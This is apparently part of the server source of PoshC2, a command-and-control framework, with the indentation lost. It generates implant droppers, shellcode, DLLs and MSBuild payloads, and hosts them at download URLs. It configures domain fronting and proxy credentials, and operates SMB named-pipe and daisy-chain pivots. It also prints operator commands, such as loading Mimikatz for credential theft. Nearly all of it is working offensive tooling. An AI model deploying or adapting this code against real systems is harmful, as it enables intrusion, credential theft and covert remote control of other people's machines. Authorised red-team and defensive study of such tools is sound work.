def do_invoke_wmijspbindpayload(user, command, randomuri):
check_module_loaded("New-JScriptShell.ps1", randomuri, user)
with open("%s%sDotNet2JS_PBind.b64" % (PayloadsDirectory, ""), "r") as p:
payload = p.read()
params = re.compile("invoke-wmijspbindpayload ", re.IGNORECASE)
params = params.sub("", command)
new_task(
"$Shellcode64=\"%s\" #%s" % (payload, "%s%sDotNet2JS_PBind.b64" %
(PayloadsDirectory, "")), user, randomuri)
cmd = "new-jscriptshell %s -payload $Shellcode64" % (params)
new_task(cmd, user, randomuri)
target = re.search("(?<=-target )\\S*", str(cmd), re.IGNORECASE)
C2 = get_c2server_all()
print()
print("To connect to the SMB named pipe use the following command:")
print(
f"{Colours.GREEN}invoke-pbind -target {target[0]} -secret {PBindSecret} -key {C2.EncKey} -pname {PBindPipeName} -client{Colours.END}"
)
print()
print("To issue commands to the SMB named pipe use the following command:")
print(Colours.GREEN + "pbind-command \"pwd\"" + Colours.END)
print()
print("To load modules to the SMB named pipe use the following command:")
print(Colours.GREEN + "pbind-loadmodule Invoke-Mimikatz.ps1" + Colours.END)
print()
print("To kill the SMB named pipe use the following command:")
print(Colours.GREEN + "pbind-kill" + Colours.END)
def do_createnewpayload(user, command, creds=None, shellcodeOnly=False):
params = re.compile("createnewpayload ", re.IGNORECASE)
params = params.sub("", command)
creds = None
if "-credid" in params:
creds, params = get_creds_from_params(params, user)
if creds is None:
return
if not creds['Password']:
print_bad("This command does not support credentials with hashes")
input("Press Enter to continue...")
clear()
return
name = input(Colours.GREEN + "Proxy Payload Name: e.g. Scenario_One ")
comms_url = input("Domain or URL in array format: https://www.example.com,https://www.example2.com ")
domainfront = input("Domain front URL in array format: fjdsklfjdskl.cloudfront.net,jobs.azureedge.net ")
proxyurl = input("Proxy URL: .e.g. http://10.150.10.1:8080 ")
pbindsecret = input(f"PBind Secret: e.g {PBindSecret} ")
pbindpipename = input(f"PBind Pipe Name: e.g. {PBindPipeName} ")
comms_url, PayloadCommsHostCount = string_to_array(comms_url)
domainfront, DomainFrontHeaderCount = string_to_array(domainfront)
if PayloadCommsHostCount == DomainFrontHeaderCount:
pass
else:
print("[-] Error - different number of host headers and URLs")
input("Press Enter to continue...")
clear()
proxyuser = ""
proxypass = ""
credsexpire = ""
if proxyurl:
if creds is not None:
proxyuser = "******" % (creds['Domain'], creds['Username'])
proxypass = creds['Password']
else:
proxyuser = input(Colours.GREEN + "Proxy User: e.g. Domain\\user ")
proxypass = input("Proxy Password: e.g. Password1 ")
credsexpire = input(Colours.GREEN + "Password/Account Expiration Date: .e.g. 15/03/2018 ")
imurl = "%s?p" % get_newimplanturl()
else:
imurl = get_newimplanturl()
C2 = get_c2server_all()
urlId = new_urldetails(name, comms_url, domainfront, proxyurl, proxyuser, proxypass, credsexpire)
newPayload = Payloads(C2.KillDate, C2.EncKey, C2.Insecure, C2.UserAgent, C2.Referrer, imurl, PayloadsDirectory, URLID=urlId, PBindPipeName=pbindpipename, PBindSecret=pbindsecret)
if shellcodeOnly:
newPayload.CreateDroppers("%s_" % name)
newPayload.CreateShellcode("%s_" % name)
else:
newPayload.CreateAll("%s_" % name)
print_good("Created new payloads")
input("Press Enter to continue...")
clear()
def do_createdaisypayload(user, command):
name = input(Colours.GREEN + "Daisy Payload Name: e.g. DC1 ")
default_url = get_first_url(PayloadCommsHost, DomainFrontHeader)
daisyurl = input(f"Daisy URL: e.g. {default_url} ")
if ("http://127.0.0.1" in daisyurl):
daisyurl = daisyurl.replace("http://127.0.0.1", "http://localhost")
if ("https://127.0.0.1" in daisyurl):
daisyurl = daisyurl.replace("https://127.0.0.1", "https://localhost")
daisyhostid = input("Select Daisy Implant Host: e.g. 5 ")
daisyhost = get_implantbyid(daisyhostid)
proxynone = "if (!$proxyurl){$wc.Proxy = [System.Net.GlobalProxySelection]::GetEmptyWebProxy()}"
pbindsecret = PBindSecret
pbindpipename = PBindPipeName
daisyurl, daisyurl_count = string_to_array(daisyurl)
daisyhostheader = ""
c = 0
daisyurls = daisyurl.split(",")
for url in daisyurls:
if c > 0:
daisyhostheader += ",\"\""
else:
daisyhostheader += "\"\""
c += 1
C2 = get_c2server_all()
urlId = new_urldetails(name, C2.PayloadCommsHost, C2.DomainFrontHeader, "",
"", "", "")
newPayload = Payloads(C2.KillDate,
C2.EncKey,
C2.Insecure,
C2.UserAgent,
C2.Referrer,
"%s?d" % get_newimplanturl(),
PayloadsDirectory,
PowerShellProxyCommand=proxynone,
URLID=urlId,
PBindPipeName=pbindpipename,
PBindSecret=pbindsecret)
newPayload.PSDropper = (newPayload.PSDropper).replace(
"$pid;%s" % (daisyurl),
"$pid;%s@%s" % (daisyhost.User, daisyhost.Domain))
newPayload.CreateDroppers("%s_" % name)
newPayload.CreateShellcode("%s_" % name)
newPayload.CreateRaw("%s_" % name)
newPayload.CreateDlls("%s_" % name)
newPayload.CreateEXE("%s_" % name)
newPayload.CreateMsbuild("%s_" % name)
newPayload.CreateDonutShellcode("%s_" % name)
newPayload.BuildDynamicPayloads("%s_" % name)
print_good("Created new %s daisy payloads" % name)
input("Press Enter to continue...")
clear()
def do_show_serverinfo(user, command):
C2 = get_c2server_all()
detailsformatted = "\nPayloadCommsHost: %s\nEncKey: %s\nDomainFrontHeader: %s\nDefaultSleep: %s\nKillDate: %s\nGET_404_Response: %s\nPoshProjectDirectory: %s\nQuickCommand: %s\nDownloadURI: %s\nDefaultProxyURL: %s\nDefaultProxyUser: %s\nDefaultProxyPass: %s\nURLS: %s\nSocksURLS: %s\nInsecure: %s\nUserAgent: %s\nReferer: %s\nPushover_APIToken: %s\nPushover_APIUser: %s\nEnableNotifications: %s\n" % (
C2.PayloadCommsHost, C2.EncKey, C2.DomainFrontHeader, C2.DefaultSleep,
C2.KillDate, C2.GET_404_Response, C2.PoshProjectDirectory,
C2.QuickCommand, C2.DownloadURI, C2.ProxyURL, C2.ProxyUser,
C2.ProxyPass, C2.URLS, C2.SocksURLS, C2.Insecure, C2.UserAgent,
C2.Referrer, C2.Pushover_APIToken, C2.Pushover_APIUser,
C2.EnableNotifications)
print_good(detailsformatted)
input("Press Enter to continue...")
clear()
def newdb(db):
print("Initializing new project folder and %s database" % db.value + Colours.GREEN)
print("")
directory = os.path.dirname(PoshProjectDirectory)
if not os.path.exists(directory):
os.makedirs(directory)
if not os.path.exists("%s/downloads" % directory):
os.makedirs("%s/downloads" % directory)
if not os.path.exists("%s/reports" % directory):
os.makedirs("%s/reports" % directory)
if not os.path.exists("%s/payloads" % directory):
os.makedirs("%s/payloads" % directory)
initializedb()
if not validate_sleep_time(DefaultSleep):
print(Colours.RED)
print("Invalid DefaultSleep in config, please specify a time such as 50s, 10m or 1h")
print(Colours.GREEN)
sys.exit(1)
setupserver(PayloadCommsHost, gen_key().decode("utf-8"), DomainFrontHeader, DefaultSleep, KillDate, GET_404_Response, PoshProjectDirectory, QuickCommand, DownloadURI, "", "", "", URLS, SocksURLS, Insecure, UserAgent, Referrer, Pushover_APIToken, Pushover_APIUser, Slack_UserID, Slack_Channel, Slack_BotToken, EnableNotifications)
rewriteFile = "%s/rewrite-rules.txt" % directory
print("Creating Rewrite Rules in: " + rewriteFile)
rewriteHeader = ["RewriteEngine On", "SSLProxyEngine On", "SSLProxyCheckPeerCN Off", "SSLProxyVerify none", "SSLProxyCheckPeerName off", "SSLProxyCheckPeerExpire off", "# Change IPs to point at C2 infrastructure below", "Define PoshC2 10.0.0.1", "Define SharpSocks 10.0.0.1", "# If running Apache 2.4.52 or Later", "Proxy100Continue Off"]
rewriteFileContents = rewriteHeader + urlConfig.fetchRewriteRules() + urlConfig.fetchSocksRewriteRules()
with open(rewriteFile, 'w') as outFile:
for line in rewriteFileContents:
outFile.write(line)
outFile.write('\n')
outFile.close()
C2 = get_c2server_all()
urlId = new_urldetails("default", C2.PayloadCommsHost, C2.DomainFrontHeader, "", "", "", "")
newPayload = Payloads(C2.KillDate, C2.EncKey, C2.Insecure, C2.UserAgent, C2.Referrer, get_newimplanturl(), PayloadsDirectory, URLID=urlId)
newPayload.CreateAll()
create_self_signed_cert(PoshProjectDirectory)
newPayload.WriteQuickstart(directory + '/quickstart.txt')
# adding default hosted payloads
QuickCommandURI = select_item("QuickCommand", "C2Server")
insert_hosted_file("%ss/86/portal" % QuickCommandURI, "%sSharp_v4_x86_Shellcode.bin" % (PayloadsDirectory), "text/html", "Yes", "Yes")
insert_hosted_file("%ss/64/portal" % QuickCommandURI, "%sSharp_v4_x64_Shellcode.bin" % (PayloadsDirectory), "text/html", "Yes", "Yes")
insert_hosted_file("%sp/86/portal" % QuickCommandURI, "%sPosh_v4_x86_Shellcode.bin" % (PayloadsDirectory), "application/x-msdownload", "No", "Yes")
insert_hosted_file("%sp/64/portal" % QuickCommandURI, "%sPosh_v4_x64_Shellcode.bin" % (PayloadsDirectory), "application/x-msdownload", "No", "Yes")
insert_hosted_file("%s_ex86" % QuickCommandURI, "%sPosh_v4_dropper_x86.exe" % (PayloadsDirectory), "application/x-msdownload", "No", "Yes")
insert_hosted_file("%s_ex64" % QuickCommandURI, "%sPosh_v4_dropper_x64.exe" % (PayloadsDirectory), "application/x-msdownload", "No", "Yes")
insert_hosted_file("%s_bs" % QuickCommandURI, "%spayload.bat" % (PayloadsDirectory), "text/html", "No", "Yes")
insert_hosted_file("%s_rp" % QuickCommandURI, "%spayload.txt" % (PayloadsDirectory), "text/html", "Yes", "Yes")
insert_hosted_file("%s_rg" % QuickCommandURI, "%srg_sct.xml" % (PayloadsDirectory), "text/html", "No", "Yes")
insert_hosted_file("%s_cs" % QuickCommandURI, "%scs_sct.xml" % (PayloadsDirectory), "text/html", "No", "Yes")
insert_hosted_file("%s_py" % QuickCommandURI, "%saes.py" % (PayloadsDirectory), "text/html", "No", "Yes")
def existingdb(db):
print("Using existing %s database / project" % db.value + Colours.GREEN)
database_connect()
C2 = get_c2server_all()
if ((C2.PayloadCommsHost == PayloadCommsHost) and (C2.DomainFrontHeader == DomainFrontHeader)):
qstart = "%squickstart.txt" % (PoshProjectDirectory)
if os.path.exists(qstart):
with open(qstart, 'r') as f:
print(f.read())
else:
print("Error different IP so regenerating payloads")
if os.path.exists("%spayloads_old" % PoshProjectDirectory):
import shutil
shutil.rmtree("%spayloads_old" % PoshProjectDirectory)
os.rename("%spayloads" % PoshProjectDirectory, "%spayloads_old" % PoshProjectDirectory)
os.makedirs("%spayloads" % PoshProjectDirectory)
update_item("PayloadCommsHost", "C2Server", PayloadCommsHost)
update_item("QuickCommand", "C2Server", QuickCommand)
update_item("DomainFrontHeader", "C2Server", DomainFrontHeader)
C2 = get_c2server_all()
urlId = new_urldetails(f"updated_host-{datetime.strftime(datetime.now(timezone.utc), '%Y-%m-%d-%H:%M:%S')}", PayloadCommsHost, C2.DomainFrontHeader, "", "", "", "")
newPayload = Payloads(C2.KillDate, C2.EncKey, C2.Insecure, C2.UserAgent, C2.Referrer, get_newimplanturl(), PayloadsDirectory, URLID=urlId)
newPayload.CreateAll()
newPayload.WriteQuickstart(PoshProjectDirectory + 'quickstart.txt')
# adding default hosted payloads
QuickCommandURI = select_item("QuickCommand", "C2Server")
insert_hosted_file("%ss/86/portal" % QuickCommandURI, "%sSharp_v4_x86_Shellcode.bin" % (PayloadsDirectory), "text/html", "Yes", "Yes")
insert_hosted_file("%ss/64/portal" % QuickCommandURI, "%sSharp_v4_x64_Shellcode.bin" % (PayloadsDirectory), "text/html", "Yes", "Yes")
insert_hosted_file("%sp/86/portal" % QuickCommandURI, "%sPosh_v4_x86_Shellcode.bin" % (PayloadsDirectory), "application/x-msdownload", "No", "Yes")
insert_hosted_file("%sp/64/portal" % QuickCommandURI, "%sPosh_v4_x64_Shellcode.bin" % (PayloadsDirectory), "application/x-msdownload", "No", "Yes")
insert_hosted_file("%s_ex86" % QuickCommandURI, "%sPosh_v4_dropper_x86.exe" % (PayloadsDirectory), "application/x-msdownload", "No", "Yes")
insert_hosted_file("%s_ex64" % QuickCommandURI, "%sPosh_v4_dropper_x64.exe" % (PayloadsDirectory), "application/x-msdownload", "No", "Yes")
insert_hosted_file("%s_bs" % QuickCommandURI, "%spayload.bat" % (PayloadsDirectory), "text/html", "No", "Yes")
insert_hosted_file("%s_rp" % QuickCommandURI, "%spayload.txt" % (PayloadsDirectory), "text/html", "Yes", "Yes")
insert_hosted_file("%s_rg" % QuickCommandURI, "%srg_sct.xml" % (PayloadsDirectory), "text/html", "No", "Yes")
insert_hosted_file("%s_cs" % QuickCommandURI, "%scs_sct.xml" % (PayloadsDirectory), "text/html", "No", "Yes")
insert_hosted_file("%s_py" % QuickCommandURI, "%saes.py" % (PayloadsDirectory), "text/html", "No", "Yes")
def main(args):
httpd = ThreadedHTTPServer((BindIP, BindPort), MyHandler)
global new_implant_url, sharpurls, hosted_files, KEY, QuickCommandURI
try:
if os.name == 'nt':
os.system('cls')
else:
os.system('clear')
except Exception:
print("cls")
print(chr(27) + "[2J")
print(Colours.GREEN + logopic)
print(Colours.END + "")
try:
if db_exists():
if len(os.listdir(PoshProjectDirectory)) > 2:
existingdb(DatabaseType)
else:
print(Colours.RED + "[-] Project directory does not exist or is empty \n")
print(Colours.RED + "[>] Create new DB and remove dir (%s) \n" % PoshProjectDirectory)
sys.exit(1)
else:
newdb(DatabaseType)
except Exception as e:
print(str(e))
traceback.print_exc()
print(Colours.RED + "[>] Create new DB and remove dir (%s) \n" % PoshProjectDirectory)
sys.exit(1)
C2 = get_c2server_all()
print("" + Colours.GREEN)
print("CONNECT URL: " + get_newimplanturl() + Colours.GREEN)
print("QUICKCOMMAND URL: " + select_item("QuickCommand", "C2Server") + Colours.GREEN)
print("WEBSERVER Log: %swebserver.log" % PoshProjectDirectory)
print("")
print("PayloadCommsHost: " + select_item("PayloadCommsHost", "C2Server") + Colours.GREEN)
print("DomainFrontHeader: " + str(select_item("DomainFrontHeader", "C2Server")) + Colours.GREEN)
QuickCommandURI = select_item("QuickCommand", "C2Server")
KEY = get_baseenckey()
new_implant_url = get_newimplanturl()
sharpurls = get_sharpurls().split(",")
hosted_files = get_hosted_files()
print("")
print(time.asctime() + " PoshC2 Server Started - %s:%s" % (BindIP, BindPort))
killdate = datetime.strptime(C2.KillDate, '%Y-%m-%d').date()
datedifference = number_of_days(date.today(), killdate)
if datedifference < 8:
print(Colours.RED + ("\nKill Date is - %s - expires in %s days" % (C2.KillDate, datedifference)))
else:
print(Colours.GREEN + ("\nKill Date is - %s - expires in %s days" % (C2.KillDate, datedifference)))
print(Colours.END)
if "https://" in PayloadCommsHost.strip():
if (os.path.isfile("%sposh.crt" % PoshProjectDirectory)) and (os.path.isfile("%sposh.key" % PoshProjectDirectory)):
try:
httpd.socket = ssl.wrap_socket(httpd.socket, keyfile="%sposh.key" % PoshProjectDirectory, certfile="%sposh.crt" % PoshProjectDirectory, server_side=True, ssl_version=ssl.PROTOCOL_TLS)
except Exception:
httpd.socket = ssl.wrap_socket(httpd.socket, keyfile="%sposh.key" % PoshProjectDirectory, certfile="%sposh.crt" % PoshProjectDirectory, server_side=True, ssl_version=ssl.PROTOCOL_TLSv1)
else:
raise ValueError("Cannot find the certificate files")
c2_message_thread = threading.Thread(target=log_c2_messages, daemon=True)
c2_message_thread.start()
try:
httpd.serve_forever()
except (KeyboardInterrupt, EOFError):
httpd.server_close()
print(time.asctime() + " PoshC2 Server Stopped - %s:%s" % (BindIP, BindPort))
sys.exit(0)
def implant_handler_command_loop(user, printhelp="", autohide=None):
while (True):
session = PromptSession(history=FileHistory('%s/.top-history' %
PoshProjectDirectory),
auto_suggest=AutoSuggestFromHistory())
try:
if user is not None:
print("User: "******"%s%s" % (user, Colours.GREEN))
print()
C2 = get_c2server_all()
killdate = datetime.strptime(C2.KillDate, '%Y-%m-%d').date()
datedifference = number_of_days(date.today(), killdate)
if datedifference < 8:
print(Colours.RED +
("\nKill Date is - %s - expires in %s days" %
(C2.KillDate, datedifference)))
print(Colours.END)
print()
implants = get_implants()
if implants:
for implant in implants:
ID = implant.ImplantID
LastSeen = implant.LastSeen
Hostname = implant.Hostname
Domain = implant.Domain
URLID = implant.URLID
DomainUser = implant.User
Arch = implant.Arch
PID = implant.PID
Pivot = implant.Pivot
Sleep = implant.Sleep.strip()
Label = implant.Label
apmsuspendshut = False
pwrStatus = get_powerstatusbyrandomuri(implant.RandomURI)
if pwrStatus is not None:
if Label is not None:
Label += " "
else:
Label = ""
apmstatus = pwrStatus[2].lower()
if (apmstatus == "shutdown"):
Label += "SHTDWN "
apmsuspendshut = True
elif (apmstatus == "suspend"
or apmstatus == "querysuspend"):
Label += "SUSPND "
apmsuspendshut = True
if not apmsuspendshut:
if (pwrStatus[7]):
Label += "LOCKED "
if (not pwrStatus[8]):
Label += "SCRN OFF "
if (not pwrStatus[3]):
if (pwrStatus[6] is not None
and pwrStatus[6].isdigit()):
Label += ("DSCHRG: %s%% " % pwrStatus[6])
else:
Label += ("DSCHRG ")
Pivot = get_implant_type_prompt_prefix(ID)
LastSeenTime = datetime.strptime(LastSeen,
"%Y-%m-%d %H:%M:%S")
LastSeenTimeString = datetime.strftime(
LastSeenTime, "%Y-%m-%d %H:%M:%S")
now = datetime.now()
if (Sleep.endswith('s')):
sleep_int = int(Sleep[:-1])
elif (Sleep.endswith('m')):
sleep_int = int(Sleep[:-1]) * 60
elif (Sleep.endswith('h')):
sleep_int = int(Sleep[:-1]) * 60 * 60
else:
print(Colours.RED)
print("Incorrect sleep format: %s" % Sleep)
print(Colours.GREEN)
continue
nowMinus3Beacons = now - timedelta(seconds=(sleep_int * 3))
nowMinus10Beacons = now - timedelta(seconds=(sleep_int *
10))
nowMinus30Beacons = now - timedelta(seconds=(sleep_int *
30))
sID = "[" + str(ID) + "]"
if not Label:
sLabel = ""
else:
Label = Label.strip()
sLabel = Colours.BLUE + "[" + Label + "]" + Colours.GREEN
if "C#;PB" in Pivot:
print(
Colours.BLUE +
"%s: Seen:%s | PID:%s | %s | PBind | %s\\%s @ %s (%s) %s %s"
% (sID.ljust(4), LastSeenTimeString, PID.ljust(5),
Sleep, Domain, DomainUser, Hostname, Arch,
Pivot, sLabel))
elif nowMinus30Beacons > LastSeenTime and autohide:
pass
elif nowMinus10Beacons > LastSeenTime:
print(
Colours.RED +
"%s: Seen:%s | PID:%s | %s | URLID: %s | %s\\%s @ %s (%s) %s %s"
% (sID.ljust(4), LastSeenTimeString, PID.ljust(5),
Sleep, URLID, Domain, DomainUser, Hostname,
Arch, Pivot, sLabel))
elif nowMinus3Beacons > LastSeenTime:
print(
Colours.YELLOW +
"%s: Seen:%s | PID:%s | %s | URLID: %s | %s\\%s @ %s (%s) %s %s"
% (sID.ljust(4), LastSeenTimeString, PID.ljust(5),
Sleep, URLID, Domain, DomainUser, Hostname,
Arch, Pivot, sLabel))
else:
print(
Colours.GREEN +
"%s: Seen:%s | PID:%s | %s | URLID: %s | %s\\%s @ %s (%s) %s %s"
% (sID.ljust(4), LastSeenTimeString, PID.ljust(5),
Sleep, URLID, Domain, DomainUser, Hostname,
Arch, Pivot, sLabel))
else:
now = datetime.now()
print(Colours.RED + "No Implants as of: %s" %
now.strftime("%Y-%m-%d %H:%M:%S"))
if printhelp:
print(printhelp)
command = session.prompt(
"\nSelect ImplantID or ALL or Comma Separated List (Enter to refresh):: ",
completer=FirstWordFuzzyWordCompleter(SERVER_COMMANDS,
WORD=True))
print("")
command = command.strip()
if (command == "") or (command == "back") or (command == "clear"):
do_back(user, command)
continue
if command.startswith("generate-reports"):
do_generate_reports(user, command)
continue
if command.startswith("generate-csvs"):
do_generate_csvs(user, command)
continue
if command.startswith("message "):
do_message(user, command)
continue
if command.startswith("show-hosted-files"):
do_show_hosted_files(user, command)
continue
if command.startswith("add-hosted-file"):
do_add_hosted_file(user, command)
continue
if command.startswith("disable-hosted-file"):
do_disable_hosted_file(user, command)
continue
if command.startswith("enable-hosted-file"):
do_enable_hosted_file(user, command)
continue
if command.startswith("show-urls") or command.startswith(
"list-urls"):
do_show_urls(user, command)
continue
if command.startswith("add-autorun"):
do_add_autorun(user, command)
continue
if command.startswith("list-autorun"):
do_list_autoruns(user, command)
continue
if command.startswith("del-autorun"):
do_del_autorun(user, command)
continue
if command.startswith("nuke-autorun"):
do_nuke_autoruns(user, command)
continue
if command.startswith("kill"):
do_del_task(user, command)
continue
if (command == "automigrate-frompowershell") or (command == "am"):
do_automigrate_frompowershell(user, command)
continue
if command.startswith("show-serverinfo"):
do_show_serverinfo(user, command)
continue
if command.startswith("turnoff-notifications"):
do_turnoff_notifications(user, command)
continue
if command.startswith("turnon-notifications"):
do_turnon_notifications(user, command)
continue
if command.startswith("set-pushover-applicationtoken"):
do_set_pushover_applicationtoken(user, command)
continue
if command.startswith("set-pushover-userkeys"):
do_set_pushover_userkeys(user, command)
continue
if command.startswith("get-killdate"):
do_get_killdate(user, command)
continue
if command.startswith("set-killdate"):
do_set_killdate(user, command)
continue
if command.startswith("set-defaultbeacon"):
do_set_defaultbeacon(user, command)
continue
if command == "get-opsec-events":
do_get_opsec_events(user, command)
continue
if command == "add-opsec-event":
do_insert_opsec_events(user, command)
continue
if command == "del-opsec-event":
do_del_opsec_events(user, command)
continue
if command.startswith("opsec"):
do_opsec(user, command)
continue
if command.startswith("listmodules"):
do_listmodules(user, command)
continue
if command.startswith('creds ') or command.strip() == "creds":
do_creds(user, command)
input("Press Enter to continue...")
clear()
continue
if (command == "pwnself") or (command == "p"):
do_pwnself(user, command)
continue
if command == "tasks":
do_tasks(user, command)
continue
if command == "cleartasks":
do_cleartasks(user, command)
continue
if command.startswith("quit"):
do_quit(user, command)
continue
if command.startswith("createdaisypayload"):
do_createdaisypayload(user, command)
continue
if command.startswith("createproxypayload"):
do_createnewpayload(user, command)
continue
if command.startswith("createnewpayload"):
do_createnewpayload(user, command)
continue
if command.startswith("createnewshellcode"):
do_createnewpayload(user, command, shellcodeOnly=True)
continue
if command == "help":
do_help(user, command)
continue
if command == "history":
do_history(user, command)
continue
if command.startswith("use "):
do_use(user, command)
implant_command_loop(command, user)
except KeyboardInterrupt:
clear()
continue
except EOFError:
new_c2_message("%s logged off." % user)
sys.exit(0)
except Exception as e:
if 'unable to open database file' not in str(e):
print_bad("Error: %s" % e)
traceback.print_exc()
def do_startdaisy(user, command, randomuri):
check_module_loaded("invoke-daisychain.ps1", randomuri, user)
elevated = input(Colours.GREEN + "Are you elevated? Y/n " + Colours.END)
domain_front = ""
proxy_user = ""
proxy_pass = ""
proxy_url = ""
cred_expiry = ""
if elevated.lower() == "n":
cont = input(
Colours.RED +
"Daisy from an unelevated context can only bind to localhost, continue? y/N "
+ Colours.END)
if cont.lower() == "n" or cont == "":
return
bind_ip = "localhost"
else:
bind_ip = input(Colours.GREEN + "Bind IP on the daisy host: " +
Colours.END)
bind_port = input(Colours.GREEN + "Bind Port on the daisy host: " +
Colours.END)
firstdaisy = input(Colours.GREEN +
"Is this the first daisy in the chain? Y/n? " +
Colours.END)
default_url = get_first_url(PayloadCommsHost, DomainFrontHeader)
default_df_header = get_first_dfheader(DomainFrontHeader)
if default_df_header == default_url:
default_df_header = None
if firstdaisy.lower() == "y" or firstdaisy == "":
upstream_url = input(Colours.GREEN +
f"C2 URL (leave blank for {default_url}): " +
Colours.END)
domain_front = input(
Colours.GREEN +
f"Domain front header (leave blank for {str(default_df_header)}): "
+ Colours.END)
proxy_user = input(
Colours.GREEN +
"Proxy user (<domain>\\<username>, leave blank if none): " +
Colours.END)
proxy_pass = input(Colours.GREEN +
"Proxy password (leave blank if none): " +
Colours.END)
proxy_url = input(Colours.GREEN + "Proxy URL (leave blank if none): " +
Colours.END)
cred_expiry = input(
Colours.GREEN +
"Password/Account Expiration Date: .e.g. 15/03/2018: ")
if not upstream_url:
upstream_url = default_url
if not domain_front:
if default_df_header:
domain_front = default_df_header
else:
domain_front = ""
else:
upstream_daisy_host = input(Colours.GREEN +
"Upstream daisy server: " + Colours.END)
upstream_daisy_port = input(Colours.GREEN + "Upstream daisy port: " +
Colours.END)
upstream_url = f"http://{upstream_daisy_host}:{upstream_daisy_port}"
command = f"invoke-daisychain -daisyserver http://{bind_ip} -port {bind_port} -c2server {upstream_url}"
if domain_front:
command = command + f" -domfront {domain_front}"
if proxy_url:
command = command + f" -proxyurl '{proxy_url}'"
if proxy_user:
command = command + f" -proxyuser '{proxy_user}'"
if proxy_pass:
command = command + f" -proxypassword '{proxy_pass}'"
if elevated.lower() == "y" or elevated == "":
firewall = input(Colours.GREEN +
"Add firewall rule? (uses netsh.exe) y/N: ")
if firewall.lower() == "n" or firewall == "":
command = command + " -nofwrule"
else:
print_good(
"Not elevated so binding to localhost and not adding firewall rule"
)
command = command + " -localhost"
urls = get_allurls()
command = command + f" -urls '{urls}'"
new_task(command, user, randomuri)
update_label("DaisyHost", randomuri)
createpayloads = input(
Colours.GREEN +
"Would you like to create payloads for this Daisy Server? Y/n ")
if createpayloads.lower() == "y" or createpayloads == "":
name = input(Colours.GREEN + "Enter a payload name: " + Colours.END)
daisyhost = get_implantdetails(randomuri)
proxynone = "if (!$proxyurl){$wc.Proxy = [System.Net.GlobalProxySelection]::GetEmptyWebProxy()}"
C2 = get_c2server_all()
urlId = new_urldetails(name, f"\"http://{bind_ip}:{bind_port}\"",
"\"\"", proxy_url, proxy_user, proxy_pass,
cred_expiry)
newPayload = Payloads(C2.KillDate,
C2.EncKey,
C2.Insecure,
C2.UserAgent,
C2.Referrer,
"%s?d" % get_newimplanturl(),
PayloadsDirectory,
URLID=urlId,
PowerShellProxyCommand=proxynone)
newPayload.PSDropper = (newPayload.PSDropper).replace(
"$pid;%s" % (upstream_url),
"$pid;%s@%s" % (daisyhost.User, daisyhost.Domain))
newPayload.CreateDroppers(name)
newPayload.CreateRaw(name)
newPayload.CreateDlls(name)
newPayload.CreateShellcode(name)
newPayload.CreateEXE(name)
newPayload.CreateMsbuild(name)
print_good("Created new %s daisy payloads" % name)
